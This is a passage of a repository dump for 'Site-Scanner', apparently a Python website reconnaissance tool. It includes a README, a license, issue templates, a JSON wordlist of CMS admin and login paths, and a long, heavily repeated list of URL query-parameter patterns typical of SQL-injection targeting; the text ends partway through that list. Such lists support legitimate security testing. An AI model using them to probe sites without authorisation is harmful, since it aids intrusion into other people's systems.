├── src ├── barcode.png ├── Ver-1.8.0.png ├── logo.txt ├── cms_metadata.json ├── patterns.json └── dir.txt ├── requirements.txt ├── .github └── ISSUE_TEMPLATE │ ├── custom.md │ ├── feature_request.md │ └── bug_report.md ├── LICENSE ├── README.md └── Site-Scanner.py /src/barcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TalMaIka/Site-Scanner/HEAD/src/barcode.png -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | # Python libraries 2 | requests==2.26.0 3 | beautifulsoup4==4.10.0 4 | 5 | -------------------------------------------------------------------------------- /src/Ver-1.8.0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TalMaIka/Site-Scanner/HEAD/src/Ver-1.8.0.png -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/custom.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Custom issue template 3 | about: Describe this issue template's purpose here. 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | 11 | -------------------------------------------------------------------------------- /src/logo.txt: -------------------------------------------------------------------------------- 1 | ___ _ _ ___ 2 | / __(_) |_ ___ ___/ __| __ __ _ _ _ _ _ ___ _ _ 3 | \__ \ | _/ -_)___\__ \/ _/ _` | ' \| ' \/ -_) '_| 4 | |___/_|\__\___| |___/\__\__,_|_||_|_||_\___|_| 5 | © Tal.M - Ver. 1.8.0 -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 39 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2024 Tal Malka 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |

Site-Scanner

3 |

4 |

Site-Scanner icon

5 |

6 | 7 | [![Number of GitHub stars](https://img.shields.io/github/stars/TalMaIka/Site-Scanner)](https://github.com/TalMaIka/Site-Scanner) 8 | ![GitHub commit activity](https://img.shields.io/github/commit-activity/m/TalMaIka/Site-Scanner) 9 | ![Number of GitHub closed issues](https://img.shields.io/github/issues-closed/TalMaIka/Site-Scanner) 10 | 11 |

12 | 13 | 14 | 15 | 16 | ## :dart: Features 17 | 18 | - **Basic Info:** Quick site information (Load Time, IP Address, Server OS...). 19 | - **Robots.txt Disallow Entries:** Detection of Robots.txt and printing Disallow Entries. 20 | - **CMS Detection & Vulnerability Report:** Automatically identifies the CMS and generates a vulnerability report. 21 | - **Admin Panel Auth Detection:** Searches for common login page variations based on the detected CMS. 22 | - **Directory Scanning:** Searches for valid directories under the specified URL. 23 | - **Security Headers Check:** Checks for the presence of important security headers. 24 | - **SSL Certificate Validation:** Validates the SSL/TLS certificate for the domain, displaying issuer information, expiration date, and days until expiry. 25 | - **Open Ports Scan:** Scans open ports on the server. 26 | - **Subdomain Scanning:** Scans for subdomains of the specified URL. 27 | - **SQL Injection Detection:** Tests for SQL injection vulnerabilities in query parameters. 28 | - **XSS Detection:** Tests for cross-site scripting vulnerabilities. 29 | - **User-Friendly Interface:** Interactive and detailed shell menu. 30 | - **Multi-Threaded:** Efficiently performs tasks in the background using threading. 31 | 32 | 33 | ## :zap: Getting Started 34 | 35 | ### Prerequisites 36 | 37 | - Python 3.x.x 38 | - Required Python packages: `requests`, `beautifulsoup4` 39 | 40 | ### Installation 41 | 42 | 1. Clone the repository: `git clone https://github.com/TalMaIka/Site-Scanner.git` 43 | 2. Navigate to the project directory: `cd Site-Scanner` 44 | 3. Requirements Installation: `pip install -r requirements.txt` 45 | 46 | ## :rocket: Usage 47 | 48 | 1. Run the tool: `python3 Site-Scanner.py` / Proxychains `proxychains python3 Site-Scanner.py` 49 | 2. Enter the URL of the website you wish to analyze. 50 | 3. Choose tasks according to the menu. 51 | 52 | ## :copyright: Contributing 53 | 54 | Found a bug or want to contribute? Great! Please submit an issue or pull request. 55 | -------------------------------------------------------------------------------- /src/cms_metadata.json: -------------------------------------------------------------------------------- 1 | { 2 | "WordPress": { 3 | "identification": { 4 | "indicators": ["WordPress"] 5 | }, 6 | "version_detection": { 7 | "indicators": [ 8 | "", 9 | "" 11 | ] 12 | }, 13 | "login_pages": [ 14 | "/wp-login.php", 15 | "/wp-admin", 16 | "/admin", 17 | "/login", 18 | "/wp/wp-login.php", 19 | "/wp-admin.php", 20 | "/shop/login", 21 | "/woocommerce/login", 22 | "/administrator" 23 | ] 24 | }, 25 | "vBulletin": { 26 | "identification": { 27 | "indicators": ["vBulletin"] 28 | }, 29 | "version_detection": { 30 | "indicators": [ 31 | "" 32 | ] 33 | }, 34 | "login_pages": [ 35 | "/admincp", "/admincp/index.php", "/admincp/login.php", 36 | "/admincp/login.html", "/admincp/login" 37 | ] 38 | }, 39 | "Prestashop": { 40 | "identification": { 41 | "indicators": ["prestashop"] 42 | }, 43 | "version_detection": { 44 | "indicators": [ 45 | "", 46 | "" 73 | ] 74 | }, 75 | "login_pages": [ 76 | "/admin", 77 | "/admin/login.php", 78 | "/admin/index.php" 79 | ] 80 | }, 81 | "PhpMyAdmin": { 82 | "identification": { 83 | "indicators": ["phpmyadmin"] 84 | }, 85 | "login_pages": [ 86 | "/phpmyadmin", 87 | "/phpmyadmin/index.php", 88 | "/phpmyadmin/login.php", 89 | "/phpmyadmin/login.html" 90 | ] 91 | }, 92 | "Cpanel": { 93 | "identification": { 94 | "indicators": ["cpanel"] 95 | }, 96 | "login_pages": [ 97 | "/cpanel", 98 | "/cpanel/login.php" 99 | ] 100 | }, 101 | "Phpbb": { 102 | "identification": { 103 | "indicators": ["phpbb"] 104 | }, 105 | "login_pages": [ 106 | "/forum/ucp.php?mode=login", 107 | "/forum/ucp.php?mode=login&sid=", 108 | "/forum/ucp.php?mode=login&sid=" 109 | ] 110 | }, 111 | "Invision Community": { 112 | "identification": { 113 | "indicators": ["powered by invision community"] 114 | }, 115 | "login_pages": [ 116 | "/forum/index.php?app=core&module=global§ion=login" 117 | ] 118 | }, 119 | "Mybb": { 120 | "identification": { 121 | "indicators": ["mybb"] 122 | }, 123 | "login_pages": [ 124 | "/forum/member.php?action=login" 125 | ] 126 | }, 127 | "Joomla": { 128 | "identification": { 129 | "indicators": ["joomla"] 130 | }, 131 | "version_detection": { 132 | "indicators": [ 133 | "" 134 | ] 135 | }, 136 | "login_pages": [ 137 | "/administrator", 138 | "/administrator/index.php", 139 | "/administrator/login.php", 140 | "/admin/login.php", 141 | "/admin/index.php", 142 | "/admin", 143 | "/admin/login", 144 | "/user", 145 | "/login" 146 | ] 147 | }, 148 | "Drupal": { 149 | "identification": { 150 | "indicators": ["drupal"] 151 | }, 152 | "version_detection": { 153 | "indicators": [ 154 | "" 155 | ] 156 | }, 157 | "login_pages": [ 158 | "/user", 159 | "/user/login", 160 | "/user/login.php", 161 | "/user/login.html", 162 | "/user/login.jsp", 163 | "/user/login.aspx", 164 | "/user/login.cgi", 165 | "/user/login.pl", 166 | "/user/login.asp", 167 | "/user/login.jsf", 168 | "/user/login.xhtml", 169 | "/user/login.ashx" 170 | ] 171 | }, 172 | "Wix": { 173 | "identification": { 174 | "indicators": ["wix.com"] 175 | }, 176 | "login_pages": [ 177 | "/_login", 178 | "/signin", 179 | "/signin/" 180 | ] 181 | }, 182 | "Squarespace": { 183 | "identification": { 184 | "indicators": ["squarespace.com"] 185 | }, 186 | "login_pages": [ 187 | "/account/login", 188 | "/account/signin", 189 | "/login", 190 | "/sign-in" 191 | ] 192 | }, 193 | "Magento": { 194 | "identification": { 195 | "indicators": ["magento"] 196 | }, 197 | "login_pages": [ 198 | "/admin", 199 | "/admin/login", 200 | "/admin/index", 201 | "/admin/login", 202 | "/admin/index", 203 | "/admin/login/index", 204 | "/admin/dashboard", 205 | "/backend", 206 | "/admin/backend", 207 | "/admin/dashboard", 208 | "/admin/signin", 209 | "/admin/signin/index", 210 | "/admin/signin/login", 211 | "/admin/signin/login/index", 212 | "/admin/signin/index/index" 213 | ] 214 | }, 215 | "Shopify": { 216 | "identification": { 217 | "indicators": ["shopify"] 218 | }, 219 | "login_pages": [ 220 | "/admin", 221 | "/admin/auth/login", 222 | "/admin/auth/login/index", 223 | "/admin/auth/signin", 224 | "/admin/auth/signin/index", 225 | "/admin/auth/signin/login", 226 | "/admin/auth/signin/login/index", 227 | "/admin/auth/signin/index/index" 228 | ] 229 | }, 230 | "Blogger": { 231 | "identification": { 232 | "indicators": ["blogger"] 233 | }, 234 | "login_pages": [ 235 | "/login", 236 | "/admin", 237 | "/dashboard", 238 | "/admin/index.php", 239 | "/admin/login.php" 240 | ] 241 | }, 242 | "Ghost": { 243 | "identification": { 244 | "indicators": ["ghost"] 245 | }, 246 | "login_pages": [ 247 | "/ghost", 248 | "/ghost/login", 249 | "/ghost/signin", 250 | "/signin", 251 | "/login", 252 | "/admin" 253 | ] 254 | }, 255 | "TYP03 CMS": { 256 | "identification": { 257 | "indicators": ["TYPO3 CMS"] 258 | }, 259 | "login_pages": [ 260 | "/typo3", 261 | "/typo3/index.php", 262 | "/typo3/index" 263 | ] 264 | }, 265 | "Unknown CMS": { 266 | "login_pages": [ 267 | "/admin", 268 | "/adminarea", 269 | "/adminarea.php", 270 | "/adminarea.html", 271 | "/admin-login", 272 | "/wp-login.php", 273 | "/admin-login.php", 274 | "/admin-login.html", 275 | "/admin1", 276 | "/admin.php", 277 | "/adminlogin", 278 | "/admin1.php", 279 | "/admin1.html", 280 | "/admin2", 281 | "/admin2.php", 282 | "/admin2.html", 283 | "/yonetim", 284 | "/yonetim.php", 285 | "/yonetim.html", 286 | "/yonetici", 287 | "/yonetici.php", 288 | "/yonetici.html", 289 | "/ccms", 290 | "/ccms.php", 291 | "/ccms.html", 292 | "/panel", 293 | "/panel.php", 294 | "/panel.html", 295 | "/controlpanel", 296 | "/controlpanel.php", 297 | "/controlpanel.html", 298 | "/admincontrol", 299 | "/admincontrol.php", 300 | "/admincontrol.html", 301 | "/admin1.asp", 302 | "/admin2.asp", 303 | "/yonetim.asp", 304 | "/yonetici.asp", 305 | "/ccms.asp", 306 | "/panel.asp", 307 | "/controlpanel.asp", 308 | "/admincontrol.asp", 309 | "/admin/account", 310 | "/admin/account.php", 311 | "/admin/account.html", 312 | "/admin/admin", 313 | "/admin/admin.php", 314 | "/admin/admin.html", 315 | "/admin-login.asp", 316 | "/admin1/login", 317 | "/admin2/login", 318 | "/yonetim/login", 319 | "/yonetici/login", 320 | "/ccms/login", 321 | "/panel/login", 322 | "/controlpanel/login", 323 | "/admincontrol/login", 324 | "/admin/account/login", 325 | "/admin1/login.asp", 326 | "/admin2/login.asp", 327 | "/yonetim/login.asp", 328 | "/yonetici/login.asp", 329 | "/ccms/login.asp", 330 | "/panel/login.asp", 331 | "/controlpanel/login.asp", 332 | "/admincontrol/login.asp", 333 | "/admin/account/login.asp", 334 | "/admin-login/login", 335 | "/admin/admin-login", 336 | "/admin-login/admin", 337 | "/admin-login/login.asp", 338 | "/admin1/login", 339 | "/admin2/login", 340 | "/yonetim/login", 341 | "/yonetici/login", 342 | "/ccms/login", 343 | "/panel/login", 344 | "/controlpanel/login", 345 | "/admincontrol/login", 346 | "/admin/account/login", 347 | "/login.php", 348 | "/login.html", 349 | "/signin.php", 350 | "/signin.html", 351 | "/log-in.php", 352 | "/log-in.html", 353 | "/userlogin", 354 | "/userlogin.php", 355 | "/userlogin.html", 356 | "/administratorlogin", 357 | "/administratorlogin.php", 358 | "/administratorlogin.html", 359 | "/adminlogin", 360 | "/adminlogin.php", 361 | "/adminlogin.html", 362 | "/secureadmin", 363 | "/secureadmin.php", 364 | "/secureadmin.html", 365 | "/webmaster", 366 | "/webmaster.php", 367 | "/webmaster.html", 368 | "/sysadmin", 369 | "/sysadmin.php", 370 | "/sysadmin.html", 371 | "/systemadmin", 372 | "/systemadmin.php", 373 | "/systemadmin.html", 374 | "/manager", 375 | "/manager.php", 376 | "/manager.html", 377 | "/moderator", 378 | "/moderator.php", 379 | "/moderator.html", 380 | "/webadmin", 381 | "/webadmin.php", 382 | "/webadmin.html", 383 | "/siteadmin", 384 | "/siteadmin.php", 385 | "/siteadmin.html", 386 | "/login-admin", 387 | "/login-admin.php", 388 | "/login-admin.html", 389 | "/admin1/login", 390 | "/admin1/login.php", 391 | "/admin1/login.html", 392 | "/admin2/login", 393 | "/admin2/login.php", 394 | "/admin2/login.html", 395 | "/admins.php", 396 | "/admins.html", 397 | "/admins/login.php", 398 | "/admins/login.html", 399 | "/admins/signin.php", 400 | "/admins/signin.html", 401 | "/admins/log-in.php", 402 | "/admins/log-in.html", 403 | "/administrator1.php", 404 | "/administrator1.html", 405 | "/administrator1/login.php", 406 | "/administrator1/login.html", 407 | "/administrator1/signin.php", 408 | "/administrator1/signin.html", 409 | "/administrator1/log-in.php", 410 | "/administrator1/log-in.html", 411 | "/administrator2.php", 412 | "/administrator2.html", 413 | "/administrator2/login.php", 414 | "/administrator2/login.html", 415 | "/administrator2/signin.php", 416 | "/administrator2/signin.html", 417 | "/administrator2/log-in.php", 418 | "/administrator2/log-in.html", 419 | "/login-admin1", 420 | "/login-admin1.php", 421 | "/login-admin1.html", 422 | "/login-admin2", 423 | "/login-admin2.php", 424 | "/login-admin2.html", 425 | "/admin_login.php", 426 | "/admin_login.html", 427 | "/admin_login/login.php", 428 | "/admin_login/login.html", 429 | "/admin_login/sign" 430 | ] 431 | } 432 | } 433 | -------------------------------------------------------------------------------- /src/patterns.json: -------------------------------------------------------------------------------- 1 | [ 2 | "products.php?cat=02020114", 3 | "product?code=ABC123", 4 | "products?category=electronics", 5 | "search?query=user_input", 6 | "category?name=something", 7 | "item?id=123", 8 | "profile?id=456", 9 | "page?number=7", 10 | "post?title=interesting", 11 | "article?id=987", 12 | "blog?tag=vulnerability", 13 | "reviews?item_id=555", 14 | "cart?product_id=999", 15 | "forum?topic_id=123", 16 | "event?id=567", 17 | "news?headline=breaking", 18 | "download?file_id=456", 19 | "gallery?album_id=789", 20 | "user?username=john_doe", 21 | "search?term=important", 22 | "support?ticket_id=12345", 23 | "view_items.php?id=", 24 | "home.php?cat=", 25 | "item_book.php?CAT=", 26 | "www/index.php?page=", 27 | "schule/termine.php?view=", 28 | "goods_detail.php?data=", 29 | "storemanager/contents/item.php?page_code=", 30 | "customer/board.htm?mode=", 31 | "help/com_view.html?code=", 32 | "n_replyboard.php?typeboard=", 33 | "eng_board/view.php?T****=", 34 | "prev_results.php?prodID=", 35 | "bbs/view.php?no=", 36 | "gnu/?doc=", 37 | "zb/view.php?uid=", 38 | "global/product/product.php?gubun=", 39 | "m_view.php?ps_db=", 40 | "productlist.php?tid=", 41 | "product-list.php?id=", 42 | "onlinesales/product.php?product_id=", 43 | "garden_equipment/Fruit-Cage/product.php?pr=", 44 | "product.php?shopprodid=", 45 | "product_info.php?products_id=", 46 | "showsub.php?id=", 47 | "productlist.php?fid=", 48 | "products.php?cat=", 49 | "product-list.php?id=", 50 | "product.php?sku=", 51 | "store/product.php?productid=", 52 | "productList.php?cat=", 53 | "product_detail.php?product_id=", 54 | "product.php?pid=", 55 | "more_details.php?id=", 56 | "county-facts/diary/vcsgen.php?id=", 57 | "idlechat/message.php?id=", 58 | "podcast/item.php?pid=", 59 | "products.php?act=", 60 | "details.php?prodId=", 61 | "socsci/events/full_details.php?id=", 62 | "ourblog.php?categoryid=", 63 | "mall/more.php?ProdID=", 64 | "archive/get.php?message_id=", 65 | "review/review_form.php?item_id=", 66 | "english/publicproducts.php?groupid=", 67 | "news_and_notices.php?news_id=", 68 | "rounds-detail.php?id=", 69 | "gig.php?id=", 70 | "board/view.php?no=", 71 | "index.php?modus=", 72 | "news_item.php?id=", 73 | "rss.php?cat=", 74 | "products/product.php?id=", 75 | "details.php?ProdID=", 76 | "els_/product/product.php?id=", 77 | "store/description.php?iddesc=", 78 | "socsci/news_items/full_story.php?id=", 79 | "naboard/memo.php?bd=", 80 | "bookmark/mybook/bookmark.php?bookPageNo=", 81 | "board/board.html?table=", 82 | "kboard/kboard.php?board=", 83 | "order.asp?lotid=", 84 | "goboard/front/board_view.php?code=", 85 | "bbs/bbsView.php?id=", 86 | "boardView.php?bbs=", 87 | "eng/rgboard/view.php?&bbs_id=", 88 | "product/product.php?cate=", 89 | "content.php?p=", 90 | "page.php?module=", 91 | "?pid=", 92 | "bookpage.php?id=", 93 | "cbmer/congres/page.php?LAN=", 94 | "content.php?id=", 95 | "news.php?ID=", 96 | "photogallery.php?id=", 97 | "index.php?id=", 98 | "product/product.php?product_no=", 99 | "nyheder.htm?show=", 100 | "book.php?ID=", 101 | "print.php?id=", 102 | "detail.php?id=", 103 | "content.php?PID=", 104 | "more_detail.php?id=", 105 | "view_author.php?id=", 106 | "main.php?id=", 107 | "english/fonction/print.php?id=", 108 | "magazines/adult_magazine_single_page.php?magid=", 109 | "product_details.php?prodid=", 110 | "magazines/adult_magazine_full_year.php?magid=", 111 | "products/card.php?prodID=", 112 | "catalog/product.php?cat_id=", 113 | "e_board/modifyform.html?code=", 114 | "community/calendar-event-fr.php?id=", 115 | "news.php?id=", 116 | "aktuelles/meldungen-detail.php?id=", 117 | "item.php?id=", 118 | "obio/detail.php?id=", 119 | "page/de/produkte/produkte.php?prodID=", 120 | "packages_display.php?ref=", 121 | "shop/index.php?cPath=", 122 | "modules.php?bookid=", 123 | "view/7/9628/1.html?reply=", 124 | "product_details.php?prodid=", 125 | "catalog/product.php?pid=", 126 | "rating.php?id=", 127 | "?page=", 128 | "catalog/main.php?cat_id=", 129 | "index.php?page=", 130 | "detail.php?prodid=", 131 | "products/product.php?pid=", 132 | "book_detail.php?BookID=", 133 | "catalog/main.php?cat_id=", 134 | "default.php?cPath=", 135 | "category.php?catid=", 136 | "categories.php?cat=", 137 | "hm/inside.php?id=", 138 | "index.php?area_id=", 139 | "gallery.php?id=", 140 | "products.php?cat=", 141 | "media/pr.php?id=", 142 | "books/book.php?proj_nr=", 143 | "products/card.php?prodID=", 144 | "general.php?id=", 145 | "news.php?t=", 146 | "usb/devices/showdev.php?id=", 147 | "content/detail.php?id=", 148 | "templet.php?acticle_id=", 149 | "news/news/title_show.php?id=", 150 | "product.php?id=", 151 | "index.php?url=", 152 | "cryolab/content.php?cid=", 153 | "ls.php?id=", 154 | "s.php?w=", 155 | "abroad/page.php?cid=", 156 | "bayer/dtnews.php?id=", 157 | "news/temp.php?id=", 158 | "index.php?url=", 159 | "book/bookcover.php?bookid=", 160 | "index.php/en/component/pvm/?view=", 161 | "product/list.php?pid=", 162 | "software_categories.php?cat_id=", 163 | "print.php?sid=", 164 | "about.php?cartID=", 165 | "accinfo.php?cartId=", 166 | "acclogin.php?cartID=", 167 | "add.php?bookid=", 168 | "add_cart.php?num=", 169 | "addcart.php?", 170 | "addItem.php", 171 | "add-to-cart.php?ID=", 172 | "addToCart.php?idProduct=", 173 | "addtomylist.php?ProdId=", 174 | "adminEditProductFields.php?intProdID=", 175 | "advSearch_h.php?idCategory=", 176 | "affiliate.php?ID=", 177 | "affiliate-agreement.cfm?storeid=", 178 | "affiliates.php?id=", 179 | "ancillary.php?ID=", 180 | "archive.php?id=", 181 | "article.php?id=", 182 | "phpx?PageID", 183 | "basket.php?id=", 184 | "Book.php?bookID=", 185 | "book_list.php?bookid=", 186 | "book_view.php?bookid=", 187 | "BookDetails.php?ID=", 188 | "browse.php?catid=", 189 | "browse_item_details.php", 190 | "Browse_Item_Details.php?Store_Id=", 191 | "buy.php?", 192 | "buy.php?bookid=", 193 | "bycategory.php?id=", 194 | "cardinfo.php?card=", 195 | "cart.php?action=", 196 | "cart.php?cart_id=", 197 | "news.php?id=", 198 | "aktuelles/meldungen-detail.php?id=", 199 | "item.php?id=", 200 | "obio/detail.php?id=", 201 | "page/de/produkte/produkte.php?prodID=", 202 | "packages_display.php?ref=", 203 | "shop/index.php?cPath=", 204 | "modules.php?bookid=", 205 | "product-range.php?rangeID=", 206 | "en/news/fullnews.php?newsid=", 207 | "deal_coupon.php?cat_id=", 208 | "show.php?id=", 209 | "blog/index.php?idBlog=", 210 | "redaktion/whiteteeth/detail.php?nr=", 211 | "HistoryStore/pages/item.php?itemID=", 212 | "aktuelles/veranstaltungen/detail.php?id=", 213 | "tecdaten/showdetail.php?prodid=", 214 | "?id=", 215 | "rating/stat.php?id=", 216 | "content.php?id=", 217 | "viewapp.php?id=", 218 | "item.php?id=", 219 | "news/newsitem.php?newsID=", 220 | "FernandFaerie/index.php?c=", 221 | "show.php?id=", 222 | "?cat=", 223 | "categories.php?cat=", 224 | "category.php?c=", 225 | "product_info.php?id=", 226 | "prod.php?cat=", 227 | "store/product.php?productid=", 228 | "browsepr.php?pr=", 229 | "product-list.php?cid=", 230 | "products.php?cat_id=", 231 | "product.php?ItemID=", 232 | "view-event.php?id=", 233 | "content.php?id=", 234 | "book.php?id=", 235 | "page/venue.php?id=", 236 | "print.php?sid=", 237 | "colourpointeducational/more_details.php?id=", 238 | "print.php?sid=", 239 | "browse/book.php?journalID=", 240 | "section.php?section=", 241 | "bookDetails.php?id=", 242 | "profiles/profile.php?profileid=", 243 | "event.php?id=", 244 | "gallery.php?id=", 245 | "category.php?CID=", 246 | "corporate/newsreleases_more.php?id=", 247 | "print.php?id=", 248 | "support?ticket_id=12345", 249 | "view_items.php?id=", 250 | "category?name=something", 251 | "post?title=interesting", 252 | "reviews?item_id=555", 253 | "cart?product_id=999", 254 | "forum?topic_id=123", 255 | "event?id=567", 256 | "download?file_id=456", 257 | "gallery?album_id=789", 258 | "user?username=john_doe", 259 | "search?term=important", 260 | "main.php?id=", 261 | "english/fonction/print.php?id=", 262 | "magazines/adult_magazine_single_page.php?magid=", 263 | "product_details.php?prodid=", 264 | "magazines/adult_magazine_full_year.php?magid=", 265 | "products/card.php?prodID=", 266 | "catalog/product.php?cat_id=", 267 | "e_board/modifyform.html?code=", 268 | "community/calendar-event-fr.php?id=", 269 | "products.php?p=", 270 | "news.php?id=", 271 | "aktuelles/meldungen-detail.php?id=", 272 | "item.php?id=", 273 | "obio/detail.php?id=", 274 | "page/de/produkte/produkte.php?prodID=", 275 | "packages_display.php?ref=", 276 | "shop/index.php?cPath=", 277 | "modules.php?bookid=", 278 | "view/7/9628/1.html?reply=", 279 | "product_details.php?prodid=", 280 | "catalog/product.php?pid=", 281 | "rating.php?id=", 282 | "?page=", 283 | "catalog/main.php?cat_id=", 284 | "index.php?page=", 285 | "detail.php?prodid=", 286 | "products/product.php?pid=", 287 | "book_detail.php?BookID=", 288 | "catalog/main.php?cat_id=", 289 | "default.php?cPath=", 290 | "category.php?catid=", 291 | "categories.php?cat=", 292 | "hm/inside.php?id=", 293 | "index.php?area_id=", 294 | "gallery.php?id=", 295 | "products.php?cat=", 296 | "media/pr.php?id=", 297 | "books/book.php?proj_nr=", 298 | "products/card.php?prodID=", 299 | "general.php?id=", 300 | "news.php?t=", 301 | "usb/devices/showdev.php?id=", 302 | "content/detail.php?id=", 303 | "templet.php?acticle_id=", 304 | "news/news/title_show.php?id=", 305 | "product.php?id=", 306 | "index.php?url=", 307 | "cryolab/content.php?cid=", 308 | "ls.php?id=", 309 | "s.php?w=", 310 | "abroad/page.php?cid=", 311 | "bayer/dtnews.php?id=", 312 | "news/temp.php?id=", 313 | "index.php?url=", 314 | "book/bookcover.php?bookid=", 315 | "index.php/en/component/pvm/?view=", 316 | "product/list.php?pid=", 317 | "software_categories.php?cat_id=", 318 | "print.php?sid=", 319 | "about.php?cartID=", 320 | "accinfo.php?cartId=", 321 | "acclogin.php?cartID=", 322 | "add.php?bookid=", 323 | "add_cart.php?num=", 324 | "addcart.php?", 325 | "addItem.php", 326 | "add-to-cart.php?ID=", 327 | "addToCart.php?idProduct=", 328 | "addtomylist.php?ProdId=", 329 | "adminEditProductFields.php?intProdID=", 330 | "advSearch_h.php?idCategory=", 331 | "affiliate.php?ID=", 332 | "affiliate-agreement.cfm?storeid=", 333 | "affiliates.php?id=", 334 | "ancillary.php?ID=", 335 | "archive.php?id=", 336 | "article.php?id=", 337 | "phpx?PageID", 338 | "basket.php?id=", 339 | "Book.php?bookID=", 340 | "book_list.php?bookid=", 341 | "book_view.php?bookid=", 342 | "BookDetails.php?ID=", 343 | "browse.php?catid=", 344 | "browse_item_details.php", 345 | "Browse_Item_Details.php?Store_Id=", 346 | "buy.php?", 347 | "buy.php?bookid=", 348 | "bycategory.php?id=", 349 | "cardinfo.php?card=", 350 | "cart.php?action=", 351 | "cart.php?cart_id=", 352 | "news.php?id=", 353 | "aktuelles/meldungen-detail.php?id=", 354 | "item.php?id=", 355 | "obio/detail.php?id=", 356 | "page/de/produkte/produkte.php?prodID=", 357 | "packages_display.php?ref=", 358 | "shop/index.php?cPath=", 359 | "modules.php?bookid=", 360 | "view/7/9628/1.html?reply=", 361 | "product_details.php?prodid=", 362 | "catalog/product.php?pid=", 363 | "rating.php?id=", 364 | "?page=", 365 | "catalog/main.php?cat_id=", 366 | "index.php?page=", 367 | "detail.php?prodid=", 368 | "products/product.php?pid=", 369 | "book_detail.php?BookID=", 370 | "catalog/main.php?cat_id=", 371 | "default.php?cPath=", 372 | "category.php?catid=", 373 | "categories.php?cat=", 374 | "hm/inside.php?id=", 375 | "index.php?area_id=", 376 | "gallery.php?id=", 377 | "products.php?cat=", 378 | "media/pr.php?id=", 379 | "books/book.php?proj_nr=", 380 | "products/card.php?prodID=", 381 | "general.php?id=", 382 | "news.php?t=", 383 | "usb/devices/showdev.php?id=", 384 | "content/detail.php?id=", 385 | "templet.php?acticle_id=", 386 | "news/news/title_show.php?id=", 387 | "product.php?id=", 388 | "index.php?url=", 389 | "cryolab/content.php?cid=", 390 | "ls.php?id=", 391 | "s.php?w=", 392 | "abroad/page.php?cid=", 393 | "bayer/dtnews.php?id=", 394 | "news/temp.php?id=", 395 | "index.php?url=", 396 | "book/bookcover.php?bookid=", 397 | "index.php/en/component/pvm/?view=", 398 | "product/list.php?pid=", 399 | "software_categories.php?cat_id=", 400 | "print.php?sid=", 401 | "about.php?cartID=", 402 | "accinfo.php?cartId=", 403 | "acclogin.php?cartID=", 404 | "add.php?bookid=", 405 | "add_cart.php?num=", 406 | "addcart.php?", 407 | "addItem.php", 408 | "add-to-cart.php?ID=", 409 | "addToCart.php?idProduct=", 410 | "addtomylist.php?ProdId=", 411 | "adminEditProductFields.php?intProdID=", 412 | "advSearch_h.php?idCategory=", 413 | "affiliate.php?ID=", 414 | "affiliate-agreement.cfm?storeid=", 415 | "affiliates.php?id=", 416 | "ancillary.php?ID=", 417 | "archive.php?id=", 418 | "article.php?id=", 419 | "phpx?PageID", 420 | "basket.php?id=", 421 | "Book.php?bookID=", 422 | "book_list.php?bookid=", 423 | "book_view.php?bookid=", 424 | "BookDetails.php?ID=", 425 | "browse.php?catid=", 426 | "browse_item_details.php", 427 | "Browse_Item_Details.php?Store_Id=", 428 | "buy.php?", 429 | "buy.php?bookid=", 430 | "bycategory.php?id=", 431 | "cardinfo.php?card=", 432 | "cart.php?action=", 433 | "cart.php?cart_id=", 434 | "item.php?id=", 435 | "item_book.php?CAT=", 436 | "www/index.php?page=", 437 | "schule/termine.php?view=", 438 | "goods_detail.php?data=", 